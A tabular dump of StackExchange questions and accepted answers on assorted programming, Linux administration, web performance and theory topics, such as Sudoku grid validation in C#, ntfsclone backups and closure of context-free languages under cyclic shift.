id
stringlengths 5
27
| question
stringlengths 19
69.9k
| title
stringlengths 1
150
| tags
stringlengths 1
118
| accepted_answer
stringlengths 4
29.9k
⌀ |
---|---|---|---|---|
_codereview.163099 | I want to change the legacy C-style code by using stl:for (posEmptyItem = startAt; strlen(collection[posEmptyItem]) > 10; posEmptyItem++) {}std::cout << posEmptyItem << std::endl;This code seems a bit hard to read. Anyway to do better?auto it = std::find_if(collection + startAt, collection + COLLECTION_SIZE, [](const char* line) { return strlen(line) <= 10; });int idx = std::distance(collection, it); Below a complete example:#include <cstring>#include <iostream>#include <algorithm>#define COLLECTION_SIZE 250int main(){ const char* collection[COLLECTION_SIZE]{ time11,time2,time3, time12,time2,time3, time13,time2,time3, time14,time2,time3, time15,time2,time3, x\n, }; auto startAt = 2; int posEmptyItem; // legacy code for (posEmptyItem = startAt; strlen(collection[posEmptyItem]) > 10; posEmptyItem++) {} std::cout << posEmptyItem << std::endl; // replace the loop to search an index by calling to standard library auto it = std::find_if(collection + startAt, collection + COLLECTION_SIZE, [](const char* line) { return strlen(line) <= 10; }); posEmptyItem = std::distance(collection, it); std::cout << posEmptyItem << std::endl; return 0;} | Retrieve the index of the first element using a predicate | c++;iterator | For easier readability you could extern the lambda expression form the find_if():auto pred = [](const char* line) { return strlen(line) <= 10; };auto it = std::find_if(collection + startAt, collection + COLLECTION_SIZE, pred);Also make use of std::begin() and std::end():auto it = std::find_if(std::begin(collection) + startAt, std::end(collection), pred);At least (but probably not last), don't use raw arrays. Rather change collection to a std::array:std::array<const char*,COLLECTION_SIZE> collection { time11,time2,time3 , time12,time2,time3 , time13,time2,time3 , time14,time2,time3 , time15,time2,time3 , x\n , };// Note my formatting style above, which makes it easier to extend the arrayHere's the fully refactored code:#include <cstring>#include <iostream>#include <algorithm>#include <array>const size_t COLLECTION_SIZE = 250; // rather use a const variable than a macroint main(){ std::array<const char*,COLLECTION_SIZE> collection { time11,time2,time3 , time12,time2,time3 , time13,time2,time3 , time14,time2,time3 , time15,time2,time3 , x\n , }; size_t startAt = 2; // care about the correct type. auto would leave you with int // replace the loop to search an index by calling to standard library auto pred = [](const char* line) { return strlen(line) <= 10; }; auto it = std::find_if(std::begin(collection) + startAt, std::end(collection), pred); auto posEmptyItem = std::distance(std::begin(collection), it); std::cout << posEmptyItem << std::endl; return 0;}See Live Demo |
_unix.363291 | I've mounted an Amazon EBS volume on /media/scientist/data1.scientist is the username.However, once in scientist, I can't do an ls command on it. See as follows:scientist@ip-10-30-10-239:/media$ ls -ltotal 4d-wx-wx--x 3 scientist scientist 4096 May 5 19:24 scientistscientist@ip-10-30-10-239:/media/scientist$ lsls: cannot open directory '.': Permission deniedHowever if I go in one directory further it works finescientist@ip-10-30-10-239:/media/scientist/data1$ lsintex lost+foundThe command I ran was sudo chown -R scientist /media/scientist. | Linux permission on mounted drive | files;permissions | You do not have read privileges on this directory: d-wx-wx--x.Directory ownership does not give you privileges to read it's content.To fix that problem, run the following command:sudo chmod u+rwx media/scientistI encourage you to read:[chown manpage][chmod manpage] |
_webmaster.104054 | I'm having quite a problem. A client's site speed is quite poor, both in GTmetrix and Google Insights. After doing all the usual stuff and good practices I managed to get it to 98% in GT (from 65) and 70 in Insights (from 54). However, those numbers are only real if I don't use GTM.If I use GTM, it starts to add external resources like mad, see example below (edited for privacy)https://mpp.mxptint.net/3/19718/?rnd=1379868585https://idsync.rlcdn.com/887036.gif?partner_uid=R4E83E_8DAB07C8_16BF9C8Dhttps://idsync.rlcdn.com/887036.gif?partner_uid=R4E83E_8DAB07C8_16BF9C8D&redirect=1https://sync.mathtag.com/sync/img?mt_exid=10017&redir=https%8A%3F%3Fidsync.rlcdn.com%3F47154.gif%8Fpartner_uid%8D%5BMM_UUID%5Dhttps://sync.mathtag.com/sync/img?mt_exid=10017&redir=https%8A%3F%3Fidsync.rlcdn.com%3F47154.gif%8Fpartner_uid%8D%5BMM_UUID%5D&mm_bnc&mm_bcthttps://idsync.rlcdn.com/47154.gif?partner_uid=db8a58ae-e040-4b00-be05-7b8d7e8a7e74Remove the following redirect chain if possible:https://googleads.g.doubleclick.net/pagead/viewthroughconversion/988097477/?random=1487790148053&cv=8&fst=1487790148053&num=1&fmt=8&guid=ON&u_h=861&u_w=1034&u_ah=861&u_aw=1034&u_cd=34&u_his=1&u_tz=-480&u_java=false&u_nplug=1&u_nmime=3&frm=0&url=https%8A%3F%3FxxxxXXXXXxxx.com%3F&tiba=xxxx%30XXXXX%30xxx%30%7C%30Your%30health.%30Your%30XXXXX.&async=1https://www.google.com/ads/user-lists/988097477/?fmt=8&num=1&cv=8&frm=0&url=https%8A%3F%3FxxxxXXXXXxxx.com%3F&random=8019846090&fpvtc=/988097477/%8Frandom%8D665770418%36cv%8D8%36fst%8D1487790000000%36num%8D1%36fmt%8D8%36guid%8DON%36u_h%8D861%36u_w%8D1034%36u_ah%8D861%36u_aw%8D1034%36u_cd%8D34%36u_his%8D1%36u_tz%8D-480%36u_java%8Dfalse%36u_nplug%8D1%36u_nmime%8D3%36frm%8D0%36url%8Dhttps%358A%353F%353FxxxxXXXXXxxx.com%353F%36tiba%8Dxxxx%3530XXXXX%3530xxx%3530%357C%3530Your%3530health.%3530Your%3530XXXXX.%36async%8D1https://www.google.ca/ads/user-lists/988097477/?fmt=8&num=1&cv=8&frm=0&url=https%8A%3F%3FxxxxXXXXXxxx.com%3F&random=8019846090&fpvtc=/988097477/%8Frandom%8D665770418%36cv%8D8%36fst%8D1487790000000%36num%8D1%36fmt%8D8%36guid%8DON%36u_h%8D861%36u_w%8D1034%36u_ah%8D861%36u_aw%8D1034%36u_cd%8D34%36u_his%8D1%36u_tz%8D-480%36u_java%8Dfalse%36u_nplug%8D1%36u_nmime%8D3%36frm%8D0%36url%8Dhttps%358A%353F%353FxxxxXXXXXxxx.com%353F%36tiba%8Dxxxx%3530XXXXX%3530xxx%3530%357C%3530Your%3530health.%3530Your%3530XXXXX.%36async%8D1&ipr=y&ulfeg=nAnd it gets me down to 87 in GT and 60 in Insights, not to mention the load speed grows 1 second. Take GTM off... back to high speed. Add it again... horrible.SO my question is: is there a way to load GTM without affecting load times? I could take a small hit, just not this ridiculously bad (note: teh GTM code came with the site, so there's a chance it's wrong) | How can I improve site speed while using Google Tag Manager? | google analytics;page speed | null |
_unix.102515 | I am new to Linux and Unix environment. I have built a Pro*C API for C++ and Oracle interaction, which much more easy to use than the conventional Pro*C technology.If you are using Pro*C then you might be aware of its pain. That, you need to write .pc file, then using Oracle precompiler, you need to compile the code to get .cpp file, then again compile it to get the .o (executable file). To make the process easy I created an API which provides the programmer with built-in classes and functions, so that he/she can implement it to boost the development of C++ and Oracle SQL.Now, I want to host the API as a freeware so, that one can download the API using apt-get to their respective system. How can I host my file over apt-get? | Host freeware API over apt-get | apt;repository | null |
_computerscience.292 | I don't know any shader languages. I've heard of GLSL and HLSL, and I'm interested in learning one or both.Are there significant differences between them that would make one or other better in certain situations? Is it useful to know both or would either cover most needs?I don't want vague answers indicating personal preference. I'm looking for specific measurable differences so that I can decide for myself which will suit me best. I don't have a specific task in mind - I'm hoping to discover whether there is one or other that I can learn and then apply to any future tasks, rather than having to learn a new language for each new task.If there are other shader languages which I have not mentioned I would be interested to hear the comparison for those too, provided they are not dependent on any particular GPU manufacturer. I want my code to be portable across different graphics cards. | What factors affect which shader language to learn? | gpu;glsl;shader;hlsl | null |
_cogsci.16208 | Well I hear this saying all the time, and one guy said that we should all just admit that this means that some folks are not smart enough for college. | The saying College is not for everyone...is that just euphemism for those who are not intelligent? | cognitive psychology;intelligence;educational psychology;iq;procedural memory | null |
_unix.32599 | I wanted to make a script which ran automatically on login so I put it into the file ~/bash.profile, but it didn't run. When I put it in bashrc, it ran on opening a terminal.What I was doing in the script was accessing a file in the pictures folder.I just added ./script.sh in ~/.bash_profile. How to make it run on login?I'm using Unity on Ubuntu 11.10. | Auto running bash script on login | bash;ubuntu;login;profile;unity | .profile and .bash_profile are files that are sourced by bash when running as a login shell such as when logging in from the Linux Text console or using SSH. They are not sourced when loading a new shell from an existing login such as when opening a new terminal window inside Unity or other graphical environment. .bashrc on the other hand is only sourced for non-login shells, though sometimes distros will source .bashrc manually from within the default .bash_profile. One workaround is to change Gnome Terminal to load the shell as a login shell from it's profile preferences, but then that would run every time you open up a new terminal window. Another option is to add it to the list of Startup Applications as suggested by @jrg. |
_webapps.73478 | I am designing a Google Form for managing a congress registration process. I need to have a unique ID number for each registration and I found an answear here: Can I add an autoincrement field to a Google Spreadsheet based on a Google Form? It was certainly very useful, but there is one litle problem I cannot solve. As the form has non required fields, the answears are different in length, so the ID is placed in different columns. I think the line in the code that controls the column where the ID is placed is this one: 21. var column = eventRange.getLastColumn() + 1;Is there a way to place the ID in a specific column, say column C? | Auto increment ID in Google Forms | google spreadsheets;google apps script | Just replace eventRange.getLastColum() + 1 with a number. Column A is 1, B is 2 etc.So if you want the ID to be placed in column C, change the code tovar column = 3; |
_webapps.51779 | I'm the sort of person who doesn't like to unfriend people on Facebook unless I actually dislike them, so I have quite a few friends that post stuff I really don't care about. Naturally, when I discovered that you can set people as acquaintances I went through my list acquaintancing people. This worked quite well for a while, but recently the little ticker thing above the chat sidebar has been full of updates from acquaintances. My newsfeed is still only stuff I actually care about, but the ticker is about 70% stuff that doesn't interest me, so I want to see if I can get it back to how it was before.Is this just how acquaintances work now, or is there something I can do to keep my acquaintances out of the ticker? | Acquaintances Showing up in Facebook Ticker | facebook | null |
_unix.125060 | This is mostly aimed at Debian/Ubuntu, but I feel savvy enough on a variety of distros to be able to adapt the solution for one distro to another.Here's my scenario. There are a few situations when the boot process will drop you to the shell (usually busybox) of the initrd. Most notably whenever you run a hardware RAID for which drivers have to be rebuilt for each and every new kernel revision. I'd like to be able to access the rescue system the same way as I would access the fully booted system.I reckon it'd be possible to put static builds of the shell(s) and sshd (OpenSSH or dropbear) into the initrd and have been looking for an existing solution that I can adjust to my needs.Assuming there is no existing solution (since I have searched for quite a while) what do I need to consider aside from using static builds where possible (or supply the libs)? Is it reasonable to simply cache a static build of dropbear and use /etc/initramfs-tools/hooks to embed that along with a converted OpenSSH sshd_config and the original host keys? | Are there any canned solutions for running sshd in the initrd? | linux;sshd;initrd;rescue | Ubuntu 16.04 contains a package called dropbear-initramfs which is supposed to provide this feature.Lightweight SSH2 server and client - initramfs integration dropbear is a SSH 2 server and client designed to be small enough to be used in small memory environments, while still being functional and secure enough for general use.It implements most required features of the SSH 2 protocol, and other features such as X11 and authentication agent forwarding.This package provides initramfs integration.The only items I needed to adjust in addition to installing said package where:Uncomment the commented out DROPBEAR=y inside /etc/initramfs-tools/conf-hooks.d/dropbearConvert my existing host keys (see below)Create and populate /etc/initramfs-tools/root/.ssh/authorized_keys. For this I opted to bind-mount /root/.ssh onto /etc/initramfs-tools/root/.sshA final update-initramfs -u -k all re-created all the initrd imagesTo convert the keys I ran these commands:/usr/lib/dropbear/dropbearconvert openssh dropbear /etc/ssh/ssh_host_rsa_key /etc/initramfs-tools/etc/dropbear/dropbear_rsa_host_key/usr/lib/dropbear/dropbearconvert openssh dropbear /etc/ssh/ssh_host_dsa_key /etc/initramfs-tools/etc/dropbear/dropbear_dss_host_key/usr/lib/dropbear/dropbearconvert openssh dropbear /etc/ssh/ssh_host_ecdsa_key /etc/initramfs-tools/etc/dropbear/dropbear_ecdsa_host_keyNote: the source and target file names differ. So don't make assumptions here. Also, /usr/lib/dropbear isn't in my PATH, so I needed to give the full path to execute dropbearconvert. |
_codereview.160589 | my code is for menu. In the exit case of the menu it must count how many times are used options 1 and 2. No matter how many times I choose 1 and 2, when I choose 3 it gives me 0 for counter1 and counter2 and I can't find out why. The code for passive class: public final class Service { private int x; public Service(int x) { setX(x); } public double getX() { return x; } public void setX(int x) { this.x = x; } public void displayMenu() { for (int i = 0; i < 60; i++) { System.out.println(); } System.out.printf(%s, Choose number\n + 1.business account \n + 2.Account for person\n + 3.Exit\n ); } public void doSelection(int choice) { int counter1 = 0; int counter2 = 0; switch (choice) { case 1: counter1++; ServiceNumber newNumber = new ServiceNumber(1,1); JOptionPane.showMessageDialog(null, newNumber.toString()); for (int i = 0; i < 60; i++) { System.out.println(); } break; case 2: counter2++; ServiceNumber newNumber2 = new ServiceNumber(2,2); JOptionPane.showMessageDialog(null, newNumber2.toString()); for (int i = 0; i < 60; i++) { System.out.println(); } break; case 3: System.out.printf(How many times have you chosen option 1 %d\n + How many times have you chosen option2: %d\n, counter1, counter2); System.exit(0); break; } } public void getUserChoice() { do { displayMenu(); Scanner input = new Scanner(System.in); int choice; choice = input.nextInt(); while (choice < 1 || choice > 3) { System.out.println(Enter new code); choice = input.nextInt(); } doSelection(choice); } while (true);The active class: public class ServiceTest { public static void main(String[] args) { Service newNumber=new Service(0); newNumber.getUserChoice(); | Why this code doesn't work | java | Your variables are local variables.int counter1 = 0;int counter2 = 0;will be reset every call to doSelection().declare them outside of the method to maintain state between calls.public void doSelection(int choice) {int counter1 = 0;int counter2 = 0;should be changed toint counter1 = 0;int counter2 = 0;public void doSelection(int choice) { |
_unix.203292 | I know there are similar questions to this but none specific to RAID 10 extracted from a NAS, so any help is greatly appreciated.So, basically the NAS is kaput but the drives are ok. Following the advice of the Seagate tech who basically said that replacing the NAS would format the drives upon start-up I want to connect the drives to a Linux PC and use MDADM to create a software array and recover the data.The problem is I have no idea how to use MDADM and influenced from other horror stories I do not want to risk using the wrong command and corrupting the data.Based on what I have read I should connect the drives via SATA to my linux PC, boot up, open a root terminal and run the following:mdadm --assemble --scanAnd then magically the drive will appear in the file manager and I can just copy the files?Am I missing something or is this too easy? Also, is the command ok?Thanks for helping ;) | Data Recovery from a 4-Disk NAS RAID 10 | linux;data recovery;mdadm;nas | The horror stories are from people running mdadm --create because they want to create a new array using existing array components. What --create does is to create a new, empty array, using existing disks or partitions (and overwriting what they used to contain).Each volume in an array contains a header which includes UUID of the array as well as information as to where it fits in the array. This allows mdadm to reconstruct arrays simply by presenting their components and letting it sort out which volumes go together and how to use them. The header content is what determines how a volume is used, not how the volume is connected to the computer. If enough volumes are present, you shouldn't need to do anything other than mdadm --assemble --scan.Running mdadm --assemble without --force won't destroy your data. |
_unix.265720 | If I run:sftp -oServerAliveInterval=10 server-2Connection is established. But after increasing (decreasing) the value from 10 to 1:sftp -oServerAliveInterval=1 server-2I am unable to connect:Connecting to server-2...Connection closed by 10.0.1.10Couldn't read packet: Connection reset by peerAny ideas why?Added -vvv:debug1: SSH2_MSG_SERVICE_ACCEPT receiveddebug2: key: id_rsa (0xxxxxxxxxxx)Connection to 10.0.1.10 timed out while waiting to readCouldn't read packet: Connection reset by peer | ServerAliveInterval and connection reset | linux;ssh;networking;sftp | Solved. Issue caused by internal bug in the app server running on Windows machine |
_softwareengineering.120927 | I'm on the way developing a Java application where user can provide a class diagram and get the corresponding Java code.I don't know how can I let the user interactively draw a class diagram in Java. I am currently getting the required parameters like attributes, functions directly from the user, and then I render a class diagram for him. I show the class diagram on a jdialog.But when it comes to multiple class diagrams, it screws me. Is there a better way to do this?This is an example of a class diagram, I need to generate this from a Java program, given the values and relationship. | Java code generation from class diagram | java;algorithms;class diagram | First point: this is fairly non-trivial. Second point: the fact that the Java environment makes the Java compiler directly available will help a lot in implementing this. I believe you should be able to collect most (all?) the information you need by walking the AST with the compiler tree API. At least from the looks of things, the part you'll care the most about will be the ClassTree interface. So, the basic idea would be to create your tree visitor, walk the tree, and collect information about the ClassTree objects you find.Once you've collected the information, it becomes mostly a matter of drawing a nicely formatted result. If you have some funds available, I've heard good things about yFiles for Java (I should also mention that the same company's yWorks UML Doclet is supposed to do nearly what you're talking about, but from JavaDac comments rather than the source itself). There are, as you'd expect, lots of alternatives to that as well. I don't know enough about most (any?) of them to comment further on them though (I did use GraphViz once, but so long ago that I don't remember much, and what little I might remember is probably obsolete anyway). |
_softwareengineering.198195 | Wonder if anyone could shed some light on this messaging construct:The documentation says that messages appear btwn brackets [] andthat the msg target/object is on the left, whilst the msg itself (and any parameters) is on the right:[msgTarget msg], e.g., [myArray insertObject:anObject atIndex:0]OK, simple enough... but then they introduce the idea that it's convenient to nest msgs in lieu of the use of temporary variables--I'll take their word for it--so the above example becomes:[[myAppObject theArray] insertObject:[myAppObject objectToInsert] atIndex:0]In other words, [myAppObject theArray] is a nested msg, one, and, two, 'theArray' is the 'message'. Well, to say I find this confusing is a bit of an understatement ... Maybe it's just me but 'theArray' doesn't evoke a message semantically or grammatically. What this looks like to a guy who knows Java is a type/class. In Java we do things likeClass objectInstance = new Class() ... the bit to the left of the assignment operator is what this so-called nested message reminds me of ... with object and class/type positions switched of course. Anyway, any insight much appreciated. | Objective C - nested messages ... confusion about | objective c;syntax;semantics;message passing | In Objective-C, by convention, you refer to properties with dot notation. Thus, you write myAppObject.theArray instead [myAppObject theArray]. In Objective-C the default getter is the name of the variable instead getVariable. For example, writing@property NSArray *theArray;creates an instance variable _theArray and generates the following accessor:-(NSArray*) theArray { return _theArray; }So by sending theArray as a message you are actually invoking a method. But again, use only dot notation for properties. |
_cs.7831 | The cyclic shift (also called rotation or conjugation) of a language $L$ is defined as $\{ yx \mid xy \in L \}$. According to wikipedia (and here) the context-free languages are closed under this operation, with references to papers from Oshiba and from Maslov. Is there an easy proof of this fact? For regular languages the closure is discussed in this form as Prove that regular languages are closed under the cycle operator. | Easy proof for context-free languages being closed under cyclic shift | formal languages;context free;closure properties | You can try to use pushdown automata. Given a pushdown automaton for the original language, we construct one for the cyclic shift. The new automaton operates in two stages, corresponding to the $y$ and the $x$ part of the word $yx$ (where $xy$ is in the original language). In the first stage, whenever the automaton would like to pop a non-terminal $A$, it can instead push a non-terminal $A'$; the idea is that at the end of the first stage, the stack would contain, in reverse order, the symbols that are found in the stack after reading $x$ by the original automaton. In the second stage (the switch is non-deterministic), instead of pushing a non-terminal $A$, we are allowed to pop a non-terminal $A'$. If the original automaton can indeed generate the stack upon reading $x$, then the new one would be able to exactly pop the entire stack.Edit: Here are some more details. Suppose we are given a PDA with alphabet $\Sigma$, set of states $Q$, set of accepting states $F$, non-terminals $\Gamma$, initial state $q_0$, and a set of allowable transitions. Each allowable transition is of the form $(q,a,A,q',\alpha)$, meaning that when in state $q$, upon reading $a \in A$ (or $a = \epsilon$, in which case it's a free transition), if the top-of-stack is $A \in \Gamma$ (or $A = \epsilon$, which means stack is empty), then the PDA can (it's a non-deterministic model) move to state $q'$, replacing $A$ with $\alpha \in \Gamma^*$.The new PDA has a new non-terminal $A'$ for each $A \in \Gamma$. For every two states $q,q' \in Q$ and $A \in \Gamma \cup \{\epsilon\}$, there are two states $(q,q',1),(q,q',2,A)$. The starting states (the actual starting state is chosen non-deterministically among them via $\epsilon$-transitions) are $(q,q,1)$. For each transition $(q,a,A,q',\alpha)$ there are corresponding transitions $((q,q'',1),a,A,(q',q'',1),\alpha)$ and $((q,q'',2,B),a,A,(q',q'',2,B),\alpha)$. There are other transitions as well.For each transition $(q,a,A,q',\alpha)$, there are transitions $((q,q'',1),a,B',(q',q'',1),B'A'\alpha)$, where $B \in \Gamma \cup \{\epsilon\}$ and $\epsilon' = \epsilon$. For every final state $q \in F$, there are transitions $((q,q'',1),\epsilon,A,(q_0,q'',2,\epsilon),A)$, where $A \in \Gamma \cup \{\epsilon\}$.For every transition $(q,a,\epsilon,q',\alpha)$, there are transitions $((q,q'',2,A),a,B',(q',q'',2,A),B'\alpha)$, where $A \in \Gamma \cup \{\epsilon\}$. For every transition $(q,a,\epsilon,q',A)$, there are transitions $((q,q'',2,B),a,A',(q',q'',2,A),\epsilon)$, where $B \in \Gamma \cup \{\epsilon\}$. For every transition $(q,a,A,q',B)$, there are generalized transitions $((q,q'',2,C),a,B'A,(q,q'',2,C),\epsilon)$; these are implemented as a sequence of two transitions through an intermediate new state. Transitions $(q,a,\epsilon,q',\alpha)$ with $|\alpha| \geq 2$ are handled similarly. For every transition $(q,a,A,q',A)$, there are transitions $((q,q'',2,A),a,B,(q',q'',2,A),B)$, where $B \in \Gamma' \cup \{\epsilon\}$. Transitions $(q,a,A,q',A\alpha)$ are handled similarly. Finally, there is a sole final state $f$, and transitions $((q,q,2,A),\epsilon,\epsilon,f,\epsilon)$.(There might be a few transitions that I missed, and some of the details that I'm omitting are somewhat messy.)Recall we're trying to accept a word $yx$, where $xy$ is accepted by the original PDA. A state $(q,q',1)$ means that we're at stage 1, at state $q$, and the original PDA is at state $q'$ after reading $x$. A state $(q,q',2,A)$ is similar, where $A$ corresponds to the last $A'$ that was popped. At stage 1, we are allowed to push $A'$ instead of popping $A$. We do that for each non-terminal that is produced while processing $x$, but only popped while processing $y$. At stage 2, we are allowed to pop $A'$ instead of pushing $A$. If we do this, then we have to remember that the top-of-stock is really $A$; this only applies when there are no temporary things on the stack, which in the simulated PDA is the same as the top-of-stack being $\epsilon$ or of the form $B'$.Here is a simple example. Consider an automaton for $x^n y^n$ that pushes $A$ for each $x$, and pops $A$ for each $y$. The new automaton accepts words of two forms: $y^k x^n y^{n-k}$ and $x^k y^n x^{n-k}$. For words of the first form, stage 1 consists of pushing $k$ times $A'$, stage 2 consists of popping $k$ times $A'$, pushing $n-k$ times $A$, and popping $n-k$ times $A$. For words of the second form, we first push $k$ times $A$, then pop $k$ times $A$, push $n-k$ times $A'$, transition to stage 2, and pop $n-k$ times $A'$.Here is a more complicated example, for the language of balanced parentheses of various types ((),[],<>) such that the immediate descendants of each type of parentheses must belong to a different type. For example, ([]<>) is OK but () is wrong. For each (, we push $A$ if the top-of-stack isn't $A$, for each ), we pop $A$. Similarly $B$,$C$ are associated with [] and <>. Here is how we accept the word >)([()]<. We consume >), pushing $C'A'$, and transition to stage 2. We consume (, popping $A'$ and remembering the top-of-stack $A$. We consume [()] , pushing and popping $BA$; when pushing $B$, we are aware that the real top-of-stack is $A$, and so square brackets are allowed (we wouldn't be fooled by >)(()<); when pushing $A$, since the top-of-stack is $B$ (which is not $\epsilon$ or of the form $X'$), then we know that $B$ is also the real top-of-stack, and so round parentheses are allowed (even though the shadow top-of-stack is $A$). Finally, we consume < and pop $C'$. |
_unix.255474 | I've got a clientmachine where I'm using a livecd to boot and backup the whole hard drive (1,8 GB is full, it has only 1 partition: NTFS as its a windows PC) onto a remote server (windows server [with a 64 bit system and filesyste on it] with a network share where I move files to).mount -t cifs //myserver/myshare -o user=user, domain=domain, password=password /mnt/gsserverdd if=/mnt/sda1 of=/mnt/gsserver/complete.binumount /mnt/sda1ntfsclone -f -o /mnt/gsserver/onlyclone2.img /dev/sda1 ntfsclone -f -o - /dev/sda1 | gzip -c > /mnt/gsserver/backup.img.gz 2>&1While the dd command executes without a hitch I got a problem with the ntfsclone command.The 2nd clone command was what I used originally....it just created a 1 kb file. In the end then I tried to use the first clone command to see if the problem stems from gzip or ntfsclone or the network.......as info here the dd command took 30 minutes to copy 23 MB of data so the network connection is quite bad.Now when I tried the first ntfsclone I was in for a surprise though:ERROR(28) ftruncate failed for file '/mnt/gsserver/onlyclone2.img': No space left on deviceDestination filesystem type is 0xff534d42The share itself has 30 GB free disk space which should be enough to save the 1,8 GB bin. So a guess of is that it has to do with the livecd boot and he tries to put up something locally before he copies (as info about the client PC here: It has only 500 MB ram), but in all honesty I'm not sure about that guess or how I could test it.What would be the reason for this error message? | ntfsclone on network no space left on device | linux;networking;ntfs | null |
_unix.148540 | See my earlier question.GRUB wouldn't recognize the XEN kernel until extra blank lines were added and the title of the GRUB entry matched the version of XEN installed on the server.I've always considered the title line to represent a label for the entry, and I never would have thought spacing would have mattered. Is there a code style guideline/wiki for GRUB with CentOS to avoid these types of issues in the future? | Why Would Spacing Matter in grub.conf? | centos;grub | null |
_codereview.148354 | Rather than checking if my angle is in the range of 0 to 2pi every time it gets set, I got the idea to store it as an unsigned short with 0xFFFF being +2pi, thus the standard overflow behavior for unsigned numbers should keep it bound to the desired range.Is it a good idea to do it this way, or is there something I'm missing?#ifndef ANGLE_H#define ANGLE_H#include <cstdint>class Angle{//static constexpr long double _PI = 3.1415926535897932384626433832795028841971693993751058209749445923078164062862089986280348; static constexpr long double _TWO_PI = 6.2831853071795864769252867665590057683943387987502116419498891846156328125724179972560696; static inline __attribute((always_inline)) __attribute((pure)) uint16_t uint16_from_double(const double a) { return (a * 0x00010000) / _TWO_PI; } uint16_t _theta; Angle(uint16_t theta) : _theta(theta) { }public: Angle(double t = 0) : _theta(uint16_from_double(t)); { } inline operator double() const { return radians(); } inline double radians() const { return ((double) _theta) / 0x00010000) * _TWO_PI; } inline double degrees() const { return ((double) _theta) / 0x00010000) * 360; }//everything is less than and greater than everything else, because it's a circle//so return if subtracting will get us there faster than adding... inline bool operator<(const Angle & it) const { return _theta < it._theta? (it._theta - _theta) < 0x00008000 : (_theta - it._theta) >= 0x00008000; } inline bool operator<=(const Angle & it) const { return _theta < it._theta? (it._theta - _theta) <= 0x00008000 : (_theta - it._theta) > 0x00008000; } inline bool operator>(const Angle & it) const { return _theta < it._theta? (it._theta - _theta) > 0x00008000 : (_theta - it._theta) <= 0x00008000; } inline bool operator>=(const Angle & it) const { return _theta < it._theta? (it._theta - _theta) >= 0x00008000 : (_theta - it._theta) < 0x00008000; } inline Angle minDelta(const Angle & it) const { uint16_t i = _theta < it._theta? it._theta - _theta : _theta - it._theta; return Angle(i < 0x00007FFF? i : 0x00010000 - i); } inline const Angle & operator=(double a) { _theta = uint16_from_double(a); return *this; } inline const Angle & operator+=(double a) { _theta += uint16_from_double(a); return *this; } inline const Angle & operator-=(double a) { _theta -= uint16_from_double(a); return *this; } inline const Angle & operator*=(double a) { _theta *= a; return *this; } inline const Angle & operator/=(double a) { _theta /= a; return *this; }};#endif // ANGLE_H | Storing angles with overflow errors | c++;integer;floating point;coordinate system | null |
_codereview.169149 | At CodeFights I found a question about the validity of Sudoku grid. Given a grid, return true if it is valid, return false otherwise. The grid is valid when each row, each column and each 3x3 sub grid contains at most one occurrence of the numbers 1 to 9.I solved it using C# and I would like some feedback on my solution.The provided grid is guaranteed to be 9x9 and to only contain the characters 1 through 9 and . (for empty cells). So I did not include any error checking. Solutionusing System;public static class Program{ public static void Main() { char[][] grid = { new char[] {'.', '.', '.', '1', '4', '.', '.', '2', '.'}, new char[] {'.', '.', '6', '.', '.', '.', '.', '.', '.'}, new char[] {'.', '.', '.', '.', '.', '.', '.', '.', '.'}, new char[] {'.', '.', '1', '.', '.', '.', '.', '.', '.'}, new char[] {'.', '6', '7', '.', '.', '.', '.', '.', '9'}, new char[] {'.', '.', '.', '.', '.', '.', '8', '1', '.'}, new char[] {'.', '3', '.', '.', '.', '.', '.', '.', '6'}, new char[] {'.', '.', '.', '.', '.', '7', '.', '.', '.'}, new char[] {'.', '.', '.', '5', '.', '.', '.', '7', '.'} }; var sudoku = new Sudoku(grid); Console.WriteLine(sudoku.IsValid()); }}public class Sudoku{ char[][] _grid; public Sudoku(char[][] grid) { _grid = grid; } public bool IsValid() { return RowsAreValid() && ColumnsAreValid() && SquaresAreValid(); } bool RowsAreValid() { return Validate(GetNumberFromRow); } bool ColumnsAreValid() { return Validate(GetNumberFromColumn); } bool SquaresAreValid() { return Validate(GetNumberFromSquare); } bool Validate(Func<int, int, int> numberGetter) { for (var row = 0; row < 9; row++) { var usedNumbers = new bool[10]; for (var column = 0; column < 9; column++) { var number = numberGetter(row, column); if (number != 0 && usedNumbers[number] == true) { return false; } usedNumbers[number] = true; } } return true; } int GetNumberFromRow(int row, int column) { return ToNumber(_grid[row][column]); } int GetNumberFromColumn(int row, int column) { return ToNumber(_grid[column][row]); } int GetNumberFromSquare(int block, int index) { var column = 3 * (block % 3) + index % 3; var row = index / 3 + 3 * (block / 3); return ToNumber(_grid[row][column]); } int ToNumber(char c) { if (c == '.') return 0; return (int)(c - '0'); }} | Check if a given grid is a valid Sudoku | c#;programming challenge;array;game;sudoku | null |
_webapps.9731 | When I am commenting on Facebook, how do I insert a new line. Let us say, that I post a status. Friend A comments on it, followed by Friend B, followed by Friend C. I am now posting a reply and I want it formatted as follows. @FriendA: ..........@FriendB: ..........@FriendC: ..........If I were to press Enter after I have written the response for FriendA, it posts that message. | Adding a New Line on Facebook Comment | facebook;formatting | To add a newline, simply type Shift+Enter. This will insert a newline character (thus making a new line) rather than enter, which causes the form to submit. Note that in some cases, Facebook strips newline characters, and it isn't consistent. For example, you can type newlines into status updates, and it will show the line breaks on your wall and in the newsfeed, but not at the top of your profile. |
_softwareengineering.313087 | We're working on a bugtracking system.Our design has a BugReport class that represents the filing of a bug of some Project in the system. BugReports have tags, representing the state/progress of the BugReport. Possible tags are e.g. New, Closed, Duplicate, Under Review, ...Tags have no responsibility other than representing the progress of the BugReport. Except for one special type of tag, Duplicate. Duplicate means that the BugReport is actually a duplicate of another BugReport in the system. When a user tags a BugReport as Duplicate, he should indicate of which BugReport the BugReport is a Duplicate of.I'm having trouble to design this part. As said before, most tags only have the functionality of representing the progress of the BugReport. Except for one (maybe more in the future) which also has the functionality to point to another BugReport.A simple enum would've sufficed if not for the Duplicate part, but I have no idea how to provide the extra functionality of Duplicate? | How do I model similar types that have different data? | design | null |
_cs.12092 | This is something I've been wondering for years. Software like Mathematica is great at manipulating expressions into simplified, factorized, and other forms. I'm wondering if there's a way, theoretically and/or practically, to find the form that has the fewest operations. The next step would be to prefer operations that are faster (ie. multiply instead of divide). Lastly, to find a form that maximizes extraction of repetitive subexpressions, so that the subexpressions can be evaluated once and substituted for potentially significant performance gains. Has any research been done in this area? Thanks. | Using a computer algebra system to optimize mathematical expressions | optimization;computer algebra | null |
